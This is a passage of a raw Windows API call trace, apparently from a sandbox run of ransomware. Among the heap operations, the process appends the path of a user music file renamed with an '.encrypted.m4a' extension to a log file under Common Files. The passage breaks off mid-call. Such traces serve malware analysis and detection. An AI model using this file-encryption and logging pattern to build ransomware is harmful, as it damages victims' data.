RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.553] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.553] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.554] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.554] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.554] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.554] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.554] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.554] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.555] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.555] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.555] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.555] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.555] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x21fa, lpOverlapped=0x0) returned 1 [0037.556] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.556] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x21fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.556] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.encrypted.m4a\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0037.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab380 [0037.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.encrypted.m4a\r\n", cchWideChar=63, lpMultiByteStr=0x7ab380, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 63 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.556] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3e, lpOverlapped=0x0) returned 1 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.556] CloseHandle (hObject=0x128) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.564] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.564] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.565] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.565] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.565] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.565] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.566] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.569] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, 